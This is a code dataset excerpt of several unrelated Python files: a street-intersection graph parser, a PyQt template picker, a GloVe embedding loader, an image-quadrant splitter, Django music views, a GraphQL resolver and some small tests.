line[len_input].isdigit():\n if space_flag==0:\n pointy+=line[len_input] \n number_flag=1\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n'\" )\n break\n elif line[len_input]==\")\":\n if(number_flag==1):\n parser_state = 8 #Go Next \n test_points.append('('+str(pointx)+','+str(pointy)+')')\n pointx=\"\"\n pointy=\"\"\n sign_flag=0\n space_flag=0\n number_flag=0\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n###State 8### \n elif parser_state==8:\n if len_input==len(line)-2:\n if line[len_input]==\" \":\n parser_state = 9 #Go Next \n else:\n sys.stderr.write(\"Error: Wrong coordinate format.\\n\" )\n else:\n if line[len_input]==\" \":\n pass\n elif line[len_input]==\"(\":\n if len_input!=len(line)-1:\n parser_state = 6 #Go Next \n sign_flag=0\n space_flag=0\n number_flag=0\n else: \n sys.stderr.write( \"Error: Wrong coordinate format.\\n\" )\n break\n######ADD/CHANGE COMMAND END######\n##########REMOVE COMMAND##########\n###State 11###\n elif parser_state==11:\n if line[len_input]==\" \":\n parser_state = 12 #Go Next \n else:\n if len_input==len(line)-1:\n sys.stderr.write( \"Error: required 'Name' argument.\\n\" )\n else:\n sys.stderr.write( \"Error: required space separation between command and 
argument.\\n\" )\n break\n###State 12###\n elif parser_state==12:\n if line[len_input]==\" \":\n pass\n elif line[len_input]=='\"':\n parser_state = 13 #Go Next\n name=\"\"\n else:\n sys.stderr.write( \"Error: required 'Name'argument.\\n\" )\n break\n###State 13###\n elif parser_state==13:\n x=line[len_input]\n if x.isalpha():\n name+=line[len_input]\n elif x.isdigit():\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n elif line[len_input]!='\"' and line[len_input]!=' ':\n sys.stderr.write( \"Error: wrong command format.\\n\" )\n break\n elif line[len_input]=='\"':\n if len_input==len(line)-2:\n if len(name)>=1:\n parser_state = 9 #Go Next\n \n else:\n sys.stderr.write( \"Error: Name not found.\\n\" )\n break\n\n elif len(name)>=1:\n parser_state = 14 #Go Next\n else:\n sys.stderr.write( \"Error: Name not found.\\n\" )\n break\n\n elif line[len_input]==\" \":\n name+=line[len_input] \n else:\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n###State 14### This state is shared between graph and remove command\n elif parser_state==14:\n error_flag=0\n for a in range(len_input,len(line)-1,1):\n if line[a]==\" \":\n pass\n else:\n error_flag=1\n if error_flag==0:\n parser_state = 9 #Go Next \n break\n else:\n if command=='r':\n sys.stderr.write(\"Error: Wrong command format.\\n\" )\n elif command=='g':\n if line[len_input]!=\" \":\n sys.stderr.write( \"Error: Wrong command format.\\n\" )\n else:\n sys.stderr.write(\"Error: Command recieves no arguments.\\n\" )\n else:\n sys.stderr.write( \"Error: Wrong command format.\\n\" )\n break\n########REMOVE COMMAND END########\n#########PARSER STATE MACHINE END#########\n if parser_state==9:\n for i in xrange(0,len(test_points),1):\n points = re.findall(\"[-+]?\\d+[\\.]?\\d*[eE]?[-+]?\\d*\", test_points[i])\n p=Point(points[0],points[1],name)\n point_list.append(p)\n return command,name,point_list\n else:\n return False\n\n##########################################\n# GRAPHING MODULE\n# Computes and prints Edges and vertexes\n# parameter: List of List of Street points\n#########################################\ndef graph_calculator(street_list):\n delete_list=[]\n intercept_list=[]\n point_intercept_list=[]\n street_intercept_list=[]\n intercept_found=False\n point_test=0\n dist_list=[]\n edge_list=[]\n sorted_street_list=[]\n vertex_list=[]\n foud_flag=0\n\n for i in xrange(0,(len(street_list))):\n x= len(street_list[i])-1\n for j in xrange(0,x,1):\n for k in xrange(0,len(street_list)):\n if k!=i:\n for l in xrange(0,(len(street_list[k])-1)):\n line_1=Line(street_list[i][j],street_list[i][j+1])\n line_2=Line(street_list[k][l],street_list[k][l+1])\n point_test= intersect(line_1, line_2)\n if point_test!= False:\n intercept_found=True\n if(len(intercept_list)>0):\n for a in range(0,(len(intercept_list))):\n if (intercept_list[a].x!=point_test.x) or (intercept_list[a].y!=point_test.y):\n intercept_list.append(point_test)\n foud_flag=1\n else:\n intercept_list.append(point_test)\n foud_flag=1\n else:\n p1=cross_product(street_list[i][j],street_list[i][j+1],street_list[k][l])\n if p1!= False:\n intercept_found=True\n intercept_list.append(street_list[k][l])\n foud_flag=1\n point_test=True\n p2=cross_product(street_list[i][j],street_list[i][j+1],street_list[k][l+1])\n if p2!= False:\n intercept_found=True\n street_list[k][l+1].name=\"intersect\"\n intercept_list.append(street_list[k][l+1])\n foud_flag=1\n point_test=True\n\n if foud_flag!= 0:\n 
################################################################################# \n #Find index of repeated intersects\n delete_list[:]=[]\n for d in range(0,(len(intercept_list))):\n for c in range(1+d,(len(intercept_list))):\n if (intercept_list[d].x==intercept_list[c].x) and(intercept_list[d].y==intercept_list[c].y):\n if c not in delete_list:\n delete_list.append(c)\n delete_list = sorted(delete_list)\n\n #Delete repeated intersects \n for f in xrange(0,(len(delete_list))):\n de= delete_list[f]-f\n del intercept_list[de] \n\n if(len(intercept_list)>1):\n #Order street values by distance from starting point \n \n dist_list[:]=[]\n for q in range(0,(len(intercept_list))):\n xdif = intercept_list[q].x-street_list[i][j].x\n ydif = intercept_list[q].y-street_list[i][j].y\n new1= ((xdif*xdif)+(ydif*ydif))**(.5)\n dist_list.append(Distance(q,new1))\n dist_list.sort(key=Distance.sort_key('distance'))\n \n point_intercept_list.append( street_list[i][j] )\n for m in range(0,(len(dist_list))):\n x=dist_list[m].index\n point_intercept_list.append(intercept_list[x])\n \n point_intercept_list.append( street_list[i][j+1] )\n\n else:\n point_intercept_list.append( street_list[i][j] ) \n for z in range(0,(len(intercept_list))):\n point_intercept_list.append(intercept_list[z])\n point_intercept_list.append( street_list[i][j+1] )\n\n intercept_list[:]=[]\n point_test=0\n foud_flag=0\n ################################################################################# \n if intercept_found==True:\n street_intercept_list.append(point_intercept_list[:])\n intercept_found=False\n point_intercept_list[:]=[]\n \n#find index of repeated values in the streets and delete them \n for x in range(0,(len(street_intercept_list))):\n delete_list[:]=[]\n for a in range(0,(len(street_intercept_list[x]))):\n for b in range(1+a,(len(street_intercept_list[x]))):\n if (street_intercept_list[x][a].x==street_intercept_list[x][b].x) and(street_intercept_list[x][a].y==street_intercept_list[x][b].y):\n if b not in delete_list:\n delete_list.append(b)\n delete_list = sorted(delete_list)\n for i in xrange(0,(len(delete_list))):\n de= delete_list[i]-i\n del street_intercept_list[x][de]\n\n\n#Generate Edge List from ordered List \n for a in range(0,(len(street_intercept_list))):\n for b in range(0,(len(street_intercept_list[a])-1)):\n if street_intercept_list[a][b].name==street_intercept_list[a][b+1].name:\n if street_intercept_list[a][b].name!=\"intersect\":\n pass ## no intercept not considered edge\n else:\n edge_list.append(Line(street_intercept_list[a][b], street_intercept_list[a][b+1]))\n else:\n edge_list.append(Line(street_intercept_list[a][b], street_intercept_list[a][b+1]))\n\n#Save all Vertexes from edge list before filtering\n for a in range(0,(len(edge_list))):\n vertex_list.append(edge_list[a].src)\n vertex_list.append(edge_list[a].dst)\n\n#Find index of repeated Vertexes\n delete_list[:]=[]\n for a in range(0,(len(vertex_list))):\n for b in range(1+a,(len(vertex_list))):\n if (vertex_list[a].x==vertex_list[b].x) and(vertex_list[a].y==vertex_list[b].y):\n if b not in delete_list:\n delete_list.append(b)\n delete_list = sorted(delete_list)\n\n#Delete repeated Vertexes \n for i in xrange(0,(len(delete_list))):\n de= delete_list[i]-i\n del vertex_list[de]\n \n#Print Graph \n sys.stdout.write( \"V = {\\n\" )\n for i in xrange(0,(len(vertex_list))):\n sys.stdout.write(str(vertex_list[i])+\"\\n\")\n sys.stdout.write(\"}\\n\")\n sys.stdout.write( \"E = {\\n\")\n for i in xrange(0,(len(edge_list))):\n if i==len(edge_list)-1:\n 
            sys.stdout.write(str(edge_list[i])+"\n")\n        else:\n            sys.stdout.write( str(edge_list[i])+",\n")\n    sys.stdout.write("}\n")\n\ndef main():\n\n    point_list=[]\n    street_list=[]\n    while True:\n        line = sys.stdin.readline()\n        input_data=Parser(line)\n        if input_data!=False:\n\n########Extract Input Data########\n            input_data=list(input_data)\n            command = input_data[0]\n            street_name = input_data[1]\n            point_list = input_data[2][:]\n\n########Add Command Interpretation########\n            if command=='a':\n\n                if len(street_list)>=1:\n                    name_found=search_street_name(street_list,street_name)\n                    if name_found=="False":\n                        if len(point_list)>1:\n                            street_list.append(point_list[:])\n                        else:\n                            sys.stderr.write( "Error: Streets need to contain at least two point coordinates\n")\n                    else:\n                        sys.stderr.write( "Error: this street has already been registered; to change it use the c command\n")\n                else:\n                    if len(point_list)>1:\n                        street_list.append(point_list[:])\n                    else:\n                        sys.stderr.write( "Error: Streets need to contain at least two point coordinates\n")\n\n########Change Command Interpretation#####\n            elif command=='c':\n                if len(street_list)>=1:\n                    name_found=search_street_name(street_list,street_name)\n                    if name_found=="False":\n                        sys.stderr.write( "Error: Street not found\n")\n                    else:\n                        if len(point_list)>1:\n                            del street_list[name_found]\n                            street_list.append(point_list[:])\n                        else:\n                            sys.stderr.write( "Error: Streets need to contain at least two point coordinates\n")\n                else:\n                    sys.stderr.write( "Error: currently there are no added Streets\n")\n\n########Remove Command Interpretation#####\n            elif command=='r':\n                if len(street_list)>=1:\n                    name_found=search_street_name(street_list,street_name)\n                    if name_found=="False":\n                        sys.stderr.write( "Error: Street not found\n")\n                    else:\n                        del street_list[name_found]\n                else:\n                    sys.stderr.write( "Error: currently there are no added Streets\n")\n                pass\n\n########Graph Command Interpretation######\n            elif command=='g':\n                if len(street_list)>=1:\n                    graph_calculator(street_list)\n                else:\n                    sys.stderr.write( "Error: currently there are no added Streets\n")\n\n            sys.exit(0)\n\nif __name__ == '__main__':\n    while True:\n        main()","sub_path":"a1ece650.py","file_name":"a1ece650.py","file_ext":"py","file_size_in_byte":21756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"515664755","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom ui_model_select import Ui_Model_Select\r\nfrom PyQt5.QtWidgets import QWidget, QTableWidgetItem, QAbstractItemView,QHeaderView, QMessageBox,QListWidgetItem, QInputDialog\r\nfrom db import Model_DB\r\nfrom PyQt5.QtCore import pyqtSignal\r\n\r\nclass MyModelSelect(QWidget, Ui_Model_Select):\r\n    # Custom signal\r\n    model_add_ok_signal = pyqtSignal(str)\r\n\r\n    def __init__(self, parent=None):\r\n        super(MyModelSelect, self).__init__(parent)\r\n        self.setupUi(self)\r\n\r\n        self.tableWidget_model.setColumnCount(2)\r\n        self.tableWidget_model.setHorizontalHeaderLabels(['名称', '类型'])\r\n        self.tableWidget_model.setSelectionBehavior(QAbstractItemView.SelectRows)\r\n        self.tableWidget_model.setEditTriggers(QAbstractItemView.NoEditTriggers)\r\n        self.tableWidget_model.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\r\n\r\n        self.radioButton_model.setChecked(True)\r\n        self.radioButton_model.toggled.connect(self.update_model)\r\n        self.pushButton_romove.clicked.connect(self.model_check_remove)\r\n        self.pushButton_confirm.clicked.connect(self.check_ok)\r\n\r\n        # Table double-click signal (shows the selected template when clicked)\r\n
        self.tableWidget_model.cellDoubleClicked.connect(self.update_check_list)\r\n\r\n        self.check_list = []\r\n        # Create the database object\r\n        self.model_db = Model_DB()\r\n        self.update_model()\r\n\r\n\r\n\r\n    def update_model(self):\r\n        # Clear the table first\r\n        self.tableWidget_model.clearContents()\r\n        # Clear the checked list\r\n        self.listWidget_model_checked.clear()\r\n        self.check_list.clear()\r\n\r\n        # Fetch template data\r\n        model_default_res = self.model_db.select_all(1)\r\n        self.model = model_default_res.fetchall()\r\n        model_custom_res = self.model_db.select_all(2)\r\n        self.model += model_custom_res.fetchall()\r\n\r\n        # Fetch template-group data\r\n        model_list_res = self.model_db.select_all(3)\r\n        self.model_list = model_list_res.fetchall()\r\n\r\n        if self.radioButton_model.isChecked():\r\n            self.tableWidget_model.setRowCount(len(self.model))\r\n            row = 0\r\n            for item in self.model:\r\n                self.tableWidget_model.setItem(row, 0, QTableWidgetItem(item[1]))\r\n                type_name = '内置模板'\r\n                if item[3] == 2:\r\n                    type_name = '自定义模板'\r\n\r\n                self.tableWidget_model.setItem(row, 1, QTableWidgetItem(type_name))\r\n                row += 1\r\n        else:\r\n            # Refresh the template groups\r\n            self.tableWidget_model.setRowCount(len(self.model_list))\r\n            row = 0\r\n            for item in self.model_list:\r\n                self.tableWidget_model.setItem(row, 0, QTableWidgetItem(item[1]))\r\n                self.tableWidget_model.setItem(row, 1, QTableWidgetItem('模板组'))\r\n                row += 1\r\n\r\n    def update_check_list(self, row, col):\r\n        '''Add the double-clicked template to the checked list'''\r\n\r\n        if self.radioButton_model.isChecked():\r\n            self.listWidget_model_checked.addItem(self.model[row][1])\r\n            self.check_list.append(self.model[row])\r\n        else:\r\n            if self.check_list:\r\n                QMessageBox.about(self, "错误", "模板组只能选择一个")\r\n                return\r\n            self.listWidget_model_checked.addItem(self.model_list[row][1])\r\n            self.check_list.append(self.model_list[row])\r\n\r\n    def model_check_remove(self):\r\n        '''Remove a template from the checked list'''\r\n\r\n        list_item = self.listWidget_model_checked.currentItem()\r\n        if not list_item:\r\n            QMessageBox.about(self, "错误", "请选择要移除的模板")\r\n            return\r\n\r\n        model_name = list_item.text()\r\n        self.listWidget_model_checked.takeItem(self.listWidget_model_checked.currentRow())\r\n\r\n        for item in self.check_list:\r\n            if item[1] == model_name:\r\n                self.check_list.remove(item)\r\n                break\r\n\r\n    def check_ok(self):\r\n        '''Send the checked templates to the main window'''\r\n        if not self.check_list:\r\n            QMessageBox.about(self, "错误", "请选择模板(双击左侧表格选择)")\r\n            return\r\n\r\n        model_text = ''\r\n        for item in self.check_list:\r\n            model_text += item[2]\r\n        # If plain templates are selected and there is more than one, ask whether to save them as a new template group\r\n        if self.radioButton_model.isChecked() and len(self.check_list) > 1:\r\n\r\n            reply = QMessageBox.information(self, '信息', '是否保存为新模板组?',\r\n                                            QMessageBox.Yes|QMessageBox.No, QMessageBox.Yes)\r\n\r\n            if reply == QMessageBox.Yes:\r\n                while True:\r\n                    model_name, ok = QInputDialog.getText(self, '模板组名称', '输入名称:')\r\n                    if ok:\r\n                        if self.model_db.select_from_name(model_name).fetchall():\r\n                            QMessageBox.about(self, "错误", "名称已存在")\r\n                        else:\r\n                            self.model_db.insert_data([model_name, model_text, 3])\r\n                            break\r\n                    else:\r\n                        return\r\n\r\n        # Emit the signal to the main window\r\n        self.model_add_ok_signal.emit(model_text)\r\n\r\n        # Clean up the checked list\r\n        self.listWidget_model_checked.clear()\r\n        self.check_list.clear()\r\n\r\n        # Close the window\r\n        self.close()\r\n\r\n","sub_path":"model_select.py","file_name":"model_select.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"304669785","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 24 13:22:27 2017\r\n\r\n@author: shiro\r\n\"\"\"\r\nimport numpy as np\r\n
### Prepare embedding vectors ###\r\nimport nltk\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\ndef load_GloveEmbedding(embedding_dim, dic_word, lemmatisation=False):\r\n    files = ['glove.6B.50d.txt', 'glove.6B.100d.txt', 'glove.6B.200d.txt', 'glove.6B.300d.txt']\r\n    if embedding_dim == 50:\r\n        file = files[0]\r\n    elif embedding_dim == 100:\r\n        file = files[1]\r\n    elif embedding_dim == 200:\r\n        file = files[2]\r\n    elif embedding_dim ==300:\r\n        file = files[3]\r\n    else:\r\n        return None\r\n\r\n    if lemmatisation==True:\r\n        lemmatizer = WordNetLemmatizer()\r\n    embeddings_index = {}\r\n    # load all coefficients, keyed by word\r\n    f = open('glove.6B/'+ file ,'r', encoding='utf8')\r\n    for line in f:\r\n        values = line.split()\r\n        if lemmatisation==True:\r\n            word = lemmatizer.lemmatize(values[0])\r\n        else:\r\n            word = values[0]\r\n        coefs = np.asarray(values[1:], dtype='float32')\r\n        embeddings_index[word] = coefs\r\n    f.close()\r\n\r\n    print('Found %s word vectors.' % len(embeddings_index))\r\n\r\n\r\n    number_word = max(list(dic_word.values()))\r\n    embedding_matrix = np.zeros((number_word + 1, embedding_dim))\r\n    ite = 0\r\n    for word, i in dic_word.items():\r\n        if i != 1:\r\n            embedding_vector = embeddings_index.get(word)\r\n            if embedding_vector is not None:\r\n                # words not found in embedding index will be all-zeros.\r\n                embedding_matrix[i] = embedding_vector\r\n                ite += 1\r\n    print(' %s words found out of %s' % (ite, number_word))\r\n    return embedding_matrix\r\n","sub_path":"embedding_word.py","file_name":"embedding_word.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"323052508","text":"class Solution:\r\n    def multiply(self, num1, num2):\r\n        \"\"\"\r\n        :type num1: str\r\n        :type num2: str\r\n        :rtype: str\r\n        \"\"\"\r\n        num1_reversed = [int(i) for i in num1][::-1]\r\n        num2_reversed = [int(i) for i in num2][::-1]\r\n        len1, len2 = len(num1_reversed), len(num2_reversed)\r\n        ans = [0 for _ in range(len1 + len2)]\r\n\r\n        for idx in range(len1):\r\n            for jdx in range(len2):\r\n                ans[idx + jdx] += num1_reversed[idx] * num2_reversed[jdx]\r\n\r\n        for ldx in range(len(ans) - 1):\r\n            ans[ldx + 1] += ans[ldx] // 10\r\n            ans[ldx] %= 10\r\n\r\n        # for kdx in range(len(ans) - 1, -1, -1):\r\n        #     while kdx > 0 and ans[kdx] == 0:\r\n        #         ans = ans[:kdx]\r\n        #         kdx -= 1\r\n        # ans = ans[::-1]\r\n        # return ''.join([str(i) for i in ans])\r\n\r\n        kdx = len(ans) - 1\r\n        while kdx > 0 and ans[kdx] == 0:\r\n            ans = ans[:kdx]\r\n            kdx -= 1\r\n        ans = ans[::-1]\r\n        return ''.join([str(i) for i in ans])\r\n\r\ns = Solution()\r\nnum1 = '100'\r\nnum2 = '456'\r\nprint(s.multiply(num1, num2))","sub_path":"leetcode/python/multiplyStrings.py","file_name":"multiplyStrings.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"202879983","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Assignment 1 - Basic image processing\n\n# __Create or find small dataset of images, using an online data source such as Kaggle. At the very least, your dataset should contain no fewer than 10 images.__\n# \n# Find the data in the folder \"cars\". 
The folder contains 15 images of different lamborghinis.\n# \n# Write a Python script which does the following:\n# \n# - __For each image, find the width, height, and number of channels__\n\n# In[ ]:\n\n\n# Importing libraries\nimport os\nimport sys\nimport numpy as np\n#import pandas as pd\nimport cv2\nfrom pathlib import Path\n\n\n# In[79]:\n\n\n# defining image path\nimage_path = os.path.join(\"..\", \"data\", \"cars\")\n# for loop to find height, width and channels for each .jpg file\nfor filename in Path(image_path).glob(\"*.jpg\"):\n # splitting image path to isolate filename\n file_path, filename = os.path.split(filename) \n path_to_image = os.path.join(file_path, filename)\n # reading in the image\n image = cv2.imread(path_to_image)\n # calculating height, width and channel\n height = image.shape[0]\n width = image.shape[1]\n channel = image.shape[2]\n # printing the width, height and channel for each image\n print(f\"{filename} has a width of {width}, a height of {height} and {channel} channels.\")\n \n\n\n# - __For each image, split image into four equal-sized quadrants (i.e. top-left, top-right, bottom-left, bottom-right)__
\n# Note: OpenCV loads images as numpy arrays indexed image[row, col], i.e. image[y, x], so the quadrant slices below put the height (rows) in the first axis; otherwise non-square images come out unequal.
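\n# (For intuition, assuming a 600x800 image, i.e. shape (600, 800, 3): image[0:300, 0:400] is the top-left quadrant and image[300:600, 400:800] the bottom-right.)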
\n# - __Save each of the split images in JPG format__ \n# \n\n# In[81]:\n\n\n# function for splitting\ndef split_and_save(direction, image, filepath, filename, width, height):\n    # calculating half width and height\n    split_width = int(width/2)\n    split_height = int(height/2)\n    # splitting and saving for top left \n    if direction == "top_left":\n        split_top_left = image[0:split_height, 0:split_width]\n        outfile_top_left = os.path.join(filepath, "split_top_left_" + str(filename))\n        cv2.imwrite(outfile_top_left, split_top_left)\n    # splitting and saving for top right \n    elif direction == "top_right":\n        split_top_right = image[0:split_height, split_width:width]\n        outfile_top_right = os.path.join(filepath, "split_top_right_" + str(filename))\n        cv2.imwrite(outfile_top_right, split_top_right)\n    # splitting and saving for bottom left \n    elif direction == "bottom_left":\n        split_bottom_left = image[split_height:height, 0:split_width]\n        outfile_bottom_left = os.path.join(filepath, "split_bottom_left_" + str(filename))\n        cv2.imwrite(outfile_bottom_left, split_bottom_left)\n    # splitting and saving for bottom right \n    elif direction == "bottom_right":\n        split_bottom_right = image[split_height:height, split_width:width]\n        outfile_bottom_right = os.path.join(filepath, "split_bottom_right_" + str(filename))\n        cv2.imwrite(outfile_bottom_right, split_bottom_right)\n    # condition for misspellings\n    else:\n        print("Please choose between 'top_left', 'top_right', 'bottom_left' and 'bottom_right'")\n\n\n# In[82]:\n\n\n# for loop for splitting and saving all images\nfor filename in Path(image_path).glob("*.jpg"):\n    file_path, filename = os.path.split(filename) \n    path_to_image = os.path.join(file_path, filename)\n    # defining where to save the split images\n    output_path = os.path.join(file_path, "split_images")\n    # reading image\n    image = cv2.imread(path_to_image)\n    # Finding height, width and channels\n    height, width, channel = image.shape\n    # Splitting the image and saving top left \n    split_and_save(direction = "top_left", \n                   image = image, \n                   filepath = output_path, \n                   filename = filename,\n                   width = width, \n                   height = height)\n    # Splitting the image and saving top right\n    split_and_save(direction = "top_right", \n                   image = image, \n                   filepath = output_path, \n                   filename = filename,\n                   width = width, \n                   height = height)\n    # Splitting the image and saving bottom left\n    split_and_save(direction = "bottom_left", \n                   image = image, \n                   filepath = output_path, \n                   filename = filename,\n                   width = width, \n                   height = height)\n    # Splitting the image and saving bottom right\n    split_and_save(direction = "bottom_right", \n                   image = image, \n                   filepath = output_path, \n                   filename = filename,\n                   width = width, \n                   height = height)\n\n\n# - __Create and save a file containing the filename, width, height for all of the new images.__
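\n# (The file-saving task does not strictly require pandas - a sketch using only the stdlib csv module, with a hypothetical output name image_info.csv:\n#\n#     import csv\n#     split_dir = os.path.join(image_path, "split_images")\n#     with open(os.path.join(split_dir, "image_info.csv"), "w", newline="") as f:\n#         writer = csv.writer(f)\n#         writer.writerow(["filename", "width", "height"])\n#         for fname in Path(split_dir).glob("*.jpg"):\n#             h, w = cv2.imread(str(fname)).shape[:2]\n#             writer.writerow([fname.name, w, h])\n# )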
\n# Couldn't get pandas to work. Tried to install in terminal but without success.\n\n# In[83]:\n\n\n# defining image path\nimage_path = os.path.join(\"..\", \"data\", \"cars\", \"split_images\")\n# for loop to find height, width and channels for each .jpg file\nfor filename in Path(image_path).glob(\"*.jpg\"):\n # splitting image path to isolate filename\n file_path, filename = os.path.split(filename) \n path_to_image = os.path.join(file_path, filename)\n # reading in the image\n image = cv2.imread(path_to_image)\n # calculating height, width and channel\n height = image.shape[0]\n width = image.shape[1]\n channel = image.shape[2]\n # printing the width, height and channel for each image\n print(f\"{filename} has a width of {width}, a height of {height} and {channel} channels.\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Assignment_1/notebooks/basic_image_processing.py","file_name":"basic_image_processing.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"207212556","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom first_app.models import *\nfrom first_app import forms\nfrom django.db.models import Avg\n# Create your views here.\n\n\ndef index(request):\n musician_list = Musician.objects.order_by('first_name')\n context = {'title': 'This is Homepage', 'musician_list': musician_list}\n return render(request, 'first_app/index.html', context=context)\n\n\ndef album_list(request, artist_id):\n artist_info = Musician.objects.get(pk=artist_id)\n all_album = Album.objects.filter(artist=artist_id).order_by('name', 'release_date')\n artist_rating = Album.objects.filter(artist=artist_id).aggregate(Avg('rating'))\n context = {'title': 'Album List', 'artist_info': artist_info, 'all_album': all_album, 'artist_rating': artist_rating}\n return render(request, 'first_app/album_list.html', context=context)\n\n\ndef add_musician(request):\n form = forms.MusicianForm()\n if request.method == \"POST\":\n form = forms.MusicianForm(request.POST)\n\n if form.is_valid():\n form.save(commit=True)\n return index(request)\n\n context = {'title': 'Add New Musician', 'musician_form': form, }\n return render(request, 'first_app/musician_form.html', context=context)\n\n\ndef add_album(request):\n form = forms.AlbumForm\n if request.method == \"POST\":\n form = forms.AlbumForm(request.POST)\n\n if form.is_valid():\n form.save(commit=True)\n return index(request)\n\n context = {'title': 'Add New Album', 'album_form': form}\n return render(request, 'first_app/album_form.html', context=context)\n\n\ndef update_artist(request, artist_id):\n artist_info = Musician.objects.get(pk=artist_id)\n form = forms.MusicianForm(instance=artist_info)\n context = {}\n if request.method == 'POST':\n form = forms.MusicianForm(request.POST, instance=artist_info)\n if form.is_valid():\n form.save(commit=True)\n context.update({'success': \"Successfully Updated!\"})\n # return album_list(request, artist_id)\n context.update({'update_form': form})\n return render(request, 'first_app/update_artist.html', context=context)\n\n\ndef update_album(request, album_id):\n album_info = Album.objects.get(pk=album_id)\n form = forms.AlbumForm(instance=album_info)\n context = {}\n if request.method == 'POST':\n form = forms.AlbumForm(request.POST, instance=album_info)\n if form.is_valid():\n form.save(commit=True)\n context.update({'success': \"Successfully Updated!\"})\n # return album_list(request, artist_id)\n 
context.update({'update_form': form})\n return render(request, 'first_app/update_album.html', context=context)\n\n\ndef delete_album(request, album_id):\n album = Album.objects.get(pk=album_id).delete()\n\n context = {'delete_message': \"Album Deleted Successfully!\"}\n return render(request, 'first_app/delete.html', context=context)\n\n\ndef delete_artist(request, artist_id):\n artist = Musician.objects.get(pk=artist_id).delete()\n\n context = {'delete_message': \"Artist Deleted Successfully!\"}\n return render(request, 'first_app/delete.html', context=context)","sub_path":"first_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"120350921","text":"import graphene\nfrom graphql_jwt.decorators import login_required\nfrom itertools import chain\n\n#Types\nfrom .__types import BaseQuestionType\n\n#Models\nfrom ..models import QuestionMultiple, QuestionOpen, QuestionYesOrNo\n\n\nclass AllQuestions(graphene.ObjectType):\n all_questions = graphene.List(BaseQuestionType)\n \n @login_required\n def resolve_all_questions(self, info, **kwargs):\n\n multi_questions = QuestionMultiple.objects.all()\n yes_no_questions = QuestionYesOrNo.objects.all()\n open_questions = QuestionOpen.objects.all()\n\n all_questions = sorted(\n chain(\n multi_questions, \n yes_no_questions, \n open_questions\n ),key=lambda instance: instance.order)\n\n return all_questions\n\n","sub_path":"app_questions/graphql/allTasks.py","file_name":"allTasks.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"341447909","text":"import sys\nimport simplejson as json\nfrom nycgeo.agent import Agent\n\nconfigpath = \"config/nycgeo.json\"\npgconf = json.loads(open(configpath,\"r\").read())\n\n\nagent = Agent(**pgconf)\nr = agent.fetch_address(\n house_number=\"529\",\n street_name=\"West+29th+St\",\n boro_name=\"Manhattan\"\n )\nprint(\"status = \",r.status_code)\nobj = json.loads(r.content)\nprint(json.dumps(obj,indent=True))\n\n\n","sub_path":"t/test-nycgeo.py","file_name":"test-nycgeo.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"99790290","text":"\"\"\"Test module for the reservation model\"\"\"\n\nimport pytest\n\npytestmark = pytest.mark.django_db\n\n\nclass TestReservationModel:\n \"\"\"Test reservation model\"\"\"\n\n def test_the_model_string_succeeds(self, add_reservations):\n \"\"\"Test that reservation model string rep is correct.\"\"\"\n\n reservation = add_reservations[0]\n assert reservation.__str__(\n ) == f'{reservation.flight} - {reservation.seat_number}'\n\n def test_reservation_creation_succeeds(self, add_reservations):\n \"\"\"\n Test that a reservation model can be successfully created.\n \"\"\"\n reservation = add_reservations[0]\n\n assert reservation.flight is not None\n assert reservation.seat_number is not None\n assert reservation.booked is False\n assert reservation.type is not None\n assert reservation.made_by is not None\n assert reservation.date_made is not None\n\n def test_reservation_deletion_succeeds(self, add_reservations):\n \"\"\"\n Test reservation deletion\n \"\"\"\n\n reservation = add_reservations[0]\n reservation.delete()\n\n assert reservation.deleted\n\n def test_reservation_hard_deletion_succeeds(self, add_reservations):\n \"\"\"\n Test reservation hard deletion\n 
